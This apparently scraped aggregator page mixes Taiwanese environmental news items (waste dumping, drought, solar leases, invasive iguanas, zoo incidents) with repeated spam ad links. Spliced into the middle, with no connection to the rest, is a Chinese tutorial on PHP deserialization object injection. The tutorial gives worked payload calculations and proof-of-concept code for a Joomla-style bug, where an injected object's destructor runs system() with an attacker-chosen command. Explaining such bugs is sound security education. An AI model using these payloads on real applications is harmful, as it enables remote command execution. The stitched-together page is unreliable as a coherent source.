七股遭倒廢棄物 科技辦案逮人

摘錄自2019年12月27日自由時報台南報導

七股區後港段一處空地遭人棄置共約15公噸事業廢棄物,案經台南環檢警合力辦案,終於在24日晚上當場查獲黃姓司機載一卡車木材廢棄物偷倒空地,連同委託黃男處理的環保公司都被移送台南地檢署偵辦。

台南市環保局接獲當地民眾舉報後,除加強巡查之外,更運用衛星影像、無人機及地理資訊軟體等科技工具「辦案」,分析非法棄置案件周邊環境、偷倒時間,通報警方埋伏巡守。

果然在24日晚間,黃姓司機竟利用平安夜載來廢棄物到後港偷倒,佳里警分局七股區後港派出所會同台南市環保局、環保署及保七總隊第三大隊當場逮到黃姓司機偷倒。

經查黃姓駕駛人受一家環保科技有限公司委託,要載至官田區合法處理廠處理,但黃男貪圖處理費用,竟將廢棄物半路丟包隨意傾倒於七股區後港段。

黃姓司機和委託黃男的環保科技有限公司因未領有公民營廢棄物清除許可文件,也未委託合法的清除業者清除處理廢棄物,逕行從事廢棄物清除處理作業並隨意棄置廢棄物,被環保局依違反廢棄物清理法告發。

涉及刑法部分另案依廢清法移送台南地檢署偵辦,最重可處5年以下有期徒刑,並得併科新台幣1500萬元以下罰金。

環保局長林淵淙表示,非法業者以租用土地或廠房倉庫堆置原料為藉口,在短期內快速堆置廢棄物後逃之夭夭,呼籲地主應確認承租者的承租用途,並於出租後加強巡視,以防堵不法業者「先承租、後棄置」。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※示波器探測執行效能最佳化的8大秘訣

※專業客製化禮物、贈品設計,辦公用品常見【L夾】搖身一變大受好評!!

※冷熱飲水機、桌上型飲水機、辦公室飲水機、直立式飲水機,選購技巧大公開!!

※哪一些是橡膠加工製品?又區分什麼用途

※如何知道自已的電腦cpu支不支持AVX指令集?

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

七省地區降水較常年同期偏少二至八成

7月下旬以來,湖北、湖南、江西、江蘇、安徽、浙江、福建七省地區降水較常年同期偏少二至八成,為1961年以來同期最少,其中江西中東部地區偏少八成以上。據12月24日中國水利部通報,旱情導致181萬人無充足食水供應。全國旱情較常年同期偏重,截至12月23日,全國耕地受旱面積1574萬畝、168萬牲畜飲水困難。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※示波器探測執行效能最佳化的8大秘訣

※專業客製化禮物、贈品設計,辦公用品常見【L夾】搖身一變大受好評!!

※冷熱飲水機、桌上型飲水機、辦公室飲水機、直立式飲水機,選購技巧大公開!!

※哪一些是橡膠加工製品?又區分什麼用途

※如何知道自已的電腦cpu支不支持AVX指令集?

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

環報局表示,發現異常水質地點為濁水圳支線

環報局表示,發現異常水質地點為濁水圳支線,屬水利會轄管,研判泡泡是由有工廠利用洗潔劑等介面活性劑清洗物品排放造成,會持續進行週邊可疑工廠稽查。

昨天(29日)稽查人員也現場採水化驗,現場檢測pH 7.1、水溫18℃、 導電度680 µS/cm;pH放流水標準為6~9 ,在正常範圍,導電度目前無放流水標準,一般以農委會「灌溉用水水質標準」中電導度(EC)限值為750 µS/cm 為參考標準,也在範圍內。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※有廠商專門客製化橡膠製品嗎?

※噴霧洗滌塔實際應用案例分享

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

※選購空壓機需注意八大事項 !

※DIY自行施工建築隔熱紙,簡易教學大公開 !

※選擇好的茶葉罐,有效地保持茶葉的鮮度與風味!

太陽能光電國有地標租 國產署:2020年再釋7案

摘錄自2019年12月30日中央社報導

財政部國產署表示,將於2020年上半年分兩批,標租七宗國有地,提供民間設置太陽能光電發電設備,面積合計逾11公頃,分別位於嘉義、台中等地。

配合行政院政策目標,預計在2020年將整體太陽光電裝置量提升至6.5GW(十億瓦),國產署盤點可用國有地,並以多元方式釋出,其中一環為主動提供適當標租標的,供民間業者設置太陽能光電發電設備。

國產署主秘王彩葉指出,國產署2019年首度釋出國有地供太陽光電業者標租,共釋出四宗標地,全部順利標脫,面積合計高達6.7公頃,預計發電量約9.1MW(百萬瓦),分別位於台中后里、台南善化、高雄美濃及嘉義布袋;且每次標租都吸引多家廠商投標,得標底價也一路升高,最高一宗來到「未來售電收入的15.22%」。

王彩葉說,由於業者詢問依舊熱烈,目前已初步盤點七宗國有地,預計在2020年2月及4月分兩批釋出標租,標租底價一樣訂為「未來售電收入的3%」。

王彩葉表示,其中有兩宗標地位於嘉義大林鎮大埔美段,面積分別為3.5公頃及2公頃,此外,台中市大安區、新竹縣湖口鄉竹九段、苗栗縣竹南鎮新崎頂段、雲林縣古坑鄉水碓東段、高雄市鳳山區建軍段,也各有1宗標地,面積約0.2公頃至1.4公頃不等。

王彩葉說,如果2020年上半年標租情形熱烈,下半年將再盤整國有地釋出標租。同時,除標租外,也積極以委託改良利用、申請開發及委託經營方式,釋出國有地供業者設置太陽能光電設備,合計已有18件成功案件,面積高達629.67公頃,預計發電量約431MW(百萬瓦)。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※專業客製化禮物、贈品設計,辦公用品常見【L夾】搖身一變大受好評!!

※示波器探測執行效能最佳化的8大秘訣

※選用哪種桶裝水,外宿露營超方便?

※(全省)堆高機租賃保養一覽表

※DIY自行施工建築隔熱紙,簡易教學大公開 !

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

縣府農業處今天發布新聞稿表示,南部地區很多民眾幾乎都在野外看過綠鬣蜥

縣府農業處今天發布新聞稿表示,南部地區很多民眾幾乎都在野外看過綠鬣蜥,牠的幼體顏色翠綠賣相討喜,原本是由業者引進當作寵物販售,不過隨體型增長外觀也逐漸改變,成體外觀酷似「酷斯拉」,市場價格快速下跌,便遭民眾及業者大量棄養,造成野外族群迅速擴散,並啃食農作物,嚴重影響農民生計及危害本土生態環境。

為了抑制綠鬣蜥野外族群持續擴散,屏東縣政府自民國102年起啟動執行防治外來侵種計畫,及補助屏東縣野鳥學會進行捕捉及族群調查,並以民眾通報及河川、溪流附近區域為主要移除地點,防止綠鬣蜥繼續擴散危害。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※示波器探測執行效能最佳化的8大秘訣

※專業客製化禮物、贈品設計,辦公用品常見【L夾】搖身一變大受好評!!

※冷熱飲水機、桌上型飲水機、辦公室飲水機、直立式飲水機,選購技巧大公開!!

※哪一些是橡膠加工製品?又區分什麼用途

※如何知道自已的電腦cpu支不支持AVX指令集?

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

今年元旦適逢地利村辦理校聯會運動會,唯鋸木競賽

今年元旦適逢地利村辦理校聯會運動會,唯鋸木競賽、裝置藝術等原民傳統活動項目需要一些木料,但國有地林木不得私自砍伐,當地達瑪巒部落因此召開部落會議,並依上述規則提出請求,盼南投林區管理處協助提供林班地疏伐殘材。

南投林管處表示,評估確認鋸木競賽、裝置藝術等均符合原民傳統文化,且獲當地部落會議通過,依法公告14日無利害關係人提出異議,因此依規同意無償提供巒大事業區第59林班柳杉材積2.836立方公尺,這也是中部地區的核准首例。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※有廠商專門客製化橡膠製品嗎?

※噴霧洗滌塔實際應用案例分享

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

※選購空壓機需注意八大事項 !

※DIY自行施工建築隔熱紙,簡易教學大公開 !

※選擇好的茶葉罐,有效地保持茶葉的鮮度與風味!

台水公司編列2年20億 汰換新北老舊水管

摘錄自2019年12月31日中央社報導

台灣自來水公司31日表示,編列兩年新台幣20億元,汰換新北市15公里的老舊自來水管。

台水31日在新北市道路安全會報簡報自來水管線汰舊更新資料,報告中指出,增加編列預算為兩年20億元,預計2020年、2021年更新板橋區、新莊區、三峽區、樹林區、瑞芳區共約15公里大口徑的老舊自來水管。

侯友宜指示工務局列出汰換自來水管改善時程表。同時,希望台水全力衝刺,儘速完成汰換並更新30年以上的老舊自來水管。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※專業客製化禮物、贈品設計,辦公用品常見【L夾】搖身一變大受好評!!

※示波器探測執行效能最佳化的8大秘訣

※選用哪種桶裝水,外宿露營超方便?

※(全省)堆高機租賃保養一覽表

※DIY自行施工建築隔熱紙,簡易教學大公開 !

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

PHP字符逃逸導致的對象注入

1.漏洞產生原因:

序列化的字符串在經過過濾函數不正確的處理而導致對象注入,目前看到都是因為過濾函數放在了serialize函數之後,要是放在序列化之前應該就不會產生這個問題

?php
function filter($string){
  $a = str_replace('x','zz',$string);
   return $a;
}

$username = "tr1ple";
$password = "aaaaax";
$user = array($username, $password);

echo(serialize($user));
echo "\n";

$r = filter(serialize($user));

echo($r);
echo "\n";

var_dump(unserialize($r));
$a='a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";';
var_dump(unserialize($a));

php特性:

1.PHP 在反序列化時,底層代碼是以 ; 作為字段的分隔,以 } 作為結尾(字符串除外),並且是根據長度判斷內容的
2.對類中不存在的屬性也會進行反序列化

以上代碼就明顯存在一個問題,即從序列化后的字符串中明顯可以看到經過filter函數以後s:6對應的字符串明顯變長了

並且如果對於a:2:{i:0;s:6:”tr1ple”;i:1;s:5:”aaaaa”;}i:1;s:5:”aaaaa”; 這種字符串而言,也能夠正常反序列化,說明php在反序列化的時候只要求一個反序列化字符串塊合法即可,當然得是第一個字符串塊

以以上代碼為例,如果能夠利用filter函數這種由一個字符變為兩個字符的特性來注入想要反序列化后得到的屬性,使其可以逃逸出更多可用的字符串,那麼我們就能反序列化得到我們想要的屬性

比如此時我們想要讓反序列化后第二個字符串為123456,此時我們的payload如果和之前的username長度為a,則filter處理以後可能username就會變成a,此時我們的payload變成了新的注入的屬性,此時反序列化后就會得到我們想要的結果,比如a:2:{i:0;s:6:”tr1ple”;i:1;s:6:”123456″;}是我們想要達到的效果,此時我們想要注入的payload明顯為:

";i:1;s:6:"123456";}

 

可以得到其長度為20

此時我們已經知道過濾的規則為x->yy,即注入一個x可以逃逸出一個字符的空位,那麼我們只需要注入20個x即可變成40個y,即可逃逸出20個空位,從而將我們的payload變為反序列化后得到的屬性值

$username = 'tr1plexxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'; //其中紅色就是我們想要注入的屬性值 
$password="aaaaa";
$user = array($username, $password);
echo(serialize($user));
echo "\n";

$r = filter(serialize($user));

echo($r);
echo "\n";
var_dump(unserialize($r));

 可以看到此時注入屬性成功,反序列化后得到的屬性即為123456

2.實例分析

joomla3.0.0-3.4.6 對象注入導致的反序列化,以下為參考別人的簡易化核心漏洞代碼

<?php
class evil{
    public $cmd;

    public function __construct($cmd){
        $this->cmd = $cmd;
    }

    public function __destruct(){
        system($this->cmd);
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    file_put_contents("dbs.txt", $data);
}

function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}

$username = "tr1ple";
$password = "A";
$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

在這裏如果想要通過注入對象來實現反序列化則必須在外部對象內進行注入存在的屬性,不能在其外部,否則php將不會進行我們注入惡意對象的反序列化

例如此時因為反序列化讀取的時候將會將六位字符\0\0\0替換成三位字符chr(0)*chr(0),因此字符串前面的s肯定是固定的,那麼s對應的字符串變少以後將會吞掉其他屬性的字符,那麼如果我們精心算好吞掉的字符長度,並且能夠控制被吞掉屬性的內容,那麼就能夠注入對象,從而反序列化其他類

比如如上所示,此時我們要注入的對象為evil,此時username和password的值我們可控,那麼我們可以在username中注入\0,來吞掉password的值,比如

<?php
$a='\0\0\0';
echo strlen($a);
$b=str_replace('\0\0\0', chr(0).'*'.chr(0), $a);
echo strlen($b);

 所以此時首先確定我們要吞掉的字符的長度

O:4:”User”:2:{s:8:”username”;s:6:”tr1ple”;s:8:”password”;s:4:”1234″;}

正常情況下我們要吞掉 “;s:8:”password”;s:4:” 為22位

但是因為注入的對象payload也在password字段,並且長度肯定是>=10的,因此s肯定是兩位數,因此這裏為22+1=23位字符

因為是6->3,因此每次添加一組\0\0\0能多吞掉3個字符,因此需要肯定都是3的倍數

因此我們假如這裏構造username為\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 

 

 則經過read函數處理后長度將變為24

 即此時能夠多吞掉24個字符,為了不讓其吞掉payload,我們可以填充1位字符A,即令password的值為A+payload即可

<?php
class evil{
    public $cmd;

    public function __construct($cmd){
        $this->cmd = $cmd;
    }

    public function __destruct(){
        system($this->cmd);
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    file_put_contents("dbs.txt", $data);
}

function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}

$username = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";
$password = "A";
$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; $shellcode=$password.$payload; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

 執行結果如上圖所示,將成功反序列化password屬性所對應的值,其值即為我們注入的對象,整個過程也容易理解,就是吞掉後面的屬性來注入屬性,那麼達到攻擊有以下要求:

1.相鄰兩個屬性的值是我們可以控制的

2.前一個屬性的s長度可以發生變化,變長變短都可以,變短的話可以吞掉後面相鄰屬性的值,然後在相鄰屬性中注入新的對象,如果邊長則可以直接在該屬性中注入對象來達到反序列化

 比如XNUCA2018 hardphp就考察了一個這個相關的trick

 

 這裏就出現了用前面的data在反序列化時向後吞一位字符,從而可以導致吞掉後面的普通用戶的username字段,而在username字段可以放上我們想要偽造的username,從而達到偽造session的目的

 參考:

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※台北網頁設計公司這麼多,該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

長沙動物園大象踩死馴養員 專家疑因發情失控

摘錄自2019年12月31日聯合新聞網報導

根據《新京報》報導,中國湖南長沙市生態動物園日前發生一件大象踩死訓養員的悲劇。

一頭56歲的大象「艾A」,由蔔姓訓養員引領進入馴養場中時,突然失控抓狂。先是用象腳攻擊訓養員,再將他推倒、不斷踩踏在訓養員身上。雖然一旁有5名其他訓養員試圖用推車趕跑大象,該頭大象卻不為所動,仍使勁攻擊訓養員,造成他不幸身亡。

慘不忍睹的情景,被柵欄外圍觀的遊客記錄下來。園方表示,該頭失控的大象約2噸重,平常表現溫馴,來到長沙已逾10年。

動物專家初步認為,這樁慘事應是大象發情所致,目前該頭大象已由園方隔離安撫,而當地警方也已著手展開調查。希望此生態動物園能積極善後、並防止有類似的情況再度發生。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※示波器探測執行效能最佳化的8大秘訣

※專業客製化禮物、贈品設計,辦公用品常見【L夾】搖身一變大受好評!!

※冷熱飲水機、桌上型飲水機、辦公室飲水機、直立式飲水機,選購技巧大公開!!

※哪一些是橡膠加工製品?又區分什麼用途

※如何知道自已的電腦cpu支不支持AVX指令集?

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

澳洲動物園抗野火 園長帶猴子老虎回家避難

摘錄自2020年1月2日中央社雪梨報導

在毀滅性野火肆虐澳洲各地的情況下,新南威爾斯省(New South Wales)一家小型動物園,成功保障園區所有動物的安全。

英國廣播公司(BBC)報導,摩哥動物園(Mogo Zoo)的靈長類動物數量在澳洲數一數二,園區內還有斑馬、犀牛與長頸鹿等大型動物。但當動物園處在野火第一線時,飼養人員仍成功保護200隻動物全數未受傷害。

新南威爾斯省12月31日對動物園所在區域下達疏散命令,但職員仍決定留下來保護動物。動物園園長史戴普斯表示,動物園能倖存下來,都是因為事先做好確實規劃。飼養人員先把區內所有可燃物都搬走,接著再遷移動物。

諸如獅子、老虎與紅毛猩猩等大型動物都被趕進夜間圍欄內,以確保牠們安全、情緒平靜。但小型動物就需要特殊庇護,所以園長史戴普斯決定把牠們通通帶回自家,至於長頸鹿和斑馬則留在自己的圍欄裡,因為牠們體型夠大,可以避開火源。

史戴普斯說,長頸鹿和斑馬是園內唯一承受壓力的動物,但壓力來源並非火災,而是飼養人員匆忙開車四處滅火,動物園員工事先準備數十萬公升的水,並把水置於車上的小型水槽四處移動,看到火就予以撲滅。他形容自己的團隊日以繼夜投入工作,若非員工的英勇作為,動物園早就陷入火海。

本站聲明:網站內容來源於https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※有廠商專門客製化橡膠製品嗎?

※噴霧洗滌塔實際應用案例分享

※票選推薦煮婦最愛手壓封口機,省荷包不犧牲品質

※選購空壓機需注意八大事項 !

※DIY自行施工建築隔熱紙,簡易教學大公開 !

※選擇好的茶葉罐,有效地保持茶葉的鮮度與風味!